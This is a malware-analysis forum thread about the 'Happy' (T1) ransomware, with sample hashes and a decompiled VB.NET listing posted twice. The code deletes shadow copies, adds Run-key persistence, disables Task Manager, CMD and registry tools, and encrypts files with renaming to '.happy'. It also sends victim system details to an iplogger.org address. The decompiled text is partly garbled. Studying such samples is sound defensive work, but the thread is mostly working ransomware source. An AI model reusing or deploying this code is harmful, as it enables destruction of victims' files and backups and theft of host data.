Happy Ransomware (T1)

Forum for analysis and discussion about malware.
Post Reply
joytv
Posts: 7
Joined: Thu Jan 10, 2019 6:46 pm

Happy Ransomware (T1)

Post by joytv » Tue Jan 29, 2019 1:41 pm

T1 Happy Ransomware
Sample 1:
MD5: 29cdb46d2e01f2efb9644c7695a007bb
VT: https://www.virustotal.com/#/file/3ed94 ... /detection

Sample 2:
MD5: b7afca788487347804156f052c613db5
VT: https://www.virustotal.com/#/file/b7afc ... 052c613db5
You do not have the required permissions to view the files attached to this post.

hackr8
Posts: 23
Joined: Fri Dec 21, 2018 1:50 pm
Contact:

Re: Happy Ransomware (T1)

Post by hackr8 » Tue Jan 29, 2019 3:04 pm

I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:

Code: Select all

Private Sub EndOf()
    System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
    Try
        webclient1.Headers
        "User-Agent"
        New String(9) {}
        New String(9) {}(0) = "Name="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
        webclient1.DownloadData("https://iplogger.org/21zut")
    
    Finally
        If (webclient1 Is Not Nothing) Then
            webclient1.Dispose()
        End If
    End Try
    System.Threading.Thread.Sleep(15000)
    ProjectData.EndApp()
End Sub
Private Sub Regs()
    New Process()
    New Process().StartInfo.FileName = "wmic.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
    Try
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
End Sub
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
    Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
    Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
    Try
        rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
        rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
        Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
        Return rijndaelmanaged1.CreateEncryptor()
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
    Return Nothing
End Function
Private Sub EncryptDirectory(ByVal path As String)
    Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
    Dim num1 As Integer = 0
    Do While (num1 < array1.Length()) 
        Dim str1 As String = array1(num1)
        Try
            System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
            T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
            Me.i = (Me.i + 1)
        
        Catch exception1 As Exception
        End Try
        num1 = (num1 + 1)
    
    Loop
End Sub
My forum: hackrhouse.freeforums.net

joytv
Posts: 7
Joined: Thu Jan 10, 2019 6:46 pm

Re: Happy Ransomware (T1)

Post by joytv » Wed Jan 30, 2019 8:37 pm

hackr8 wrote:
Tue Jan 29, 2019 3:04 pm
I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:

Code: Select all

Private Sub EndOf()
    System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
    Try
        webclient1.Headers
        "User-Agent"
        New String(9) {}
        New String(9) {}(0) = "Name="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
        webclient1.DownloadData("https://iplogger.org/21zut")
    
    Finally
        If (webclient1 Is Not Nothing) Then
            webclient1.Dispose()
        End If
    End Try
    System.Threading.Thread.Sleep(15000)
    ProjectData.EndApp()
End Sub
Private Sub Regs()
    New Process()
    New Process().StartInfo.FileName = "wmic.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
    Try
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
End Sub
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
    Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
    Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
    Try
        rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
        rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
        Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
        Return rijndaelmanaged1.CreateEncryptor()
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
    Return Nothing
End Function
Private Sub EncryptDirectory(ByVal path As String)
    Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
    Dim num1 As Integer = 0
    Do While (num1 < array1.Length()) 
        Dim str1 As String = array1(num1)
        Try
            System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
            T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
            Me.i = (Me.i + 1)
        
        Catch exception1 As Exception
        End Try
        num1 = (num1 + 1)
    
    Loop
End Sub
100% .Net cheap ransomware.

Post Reply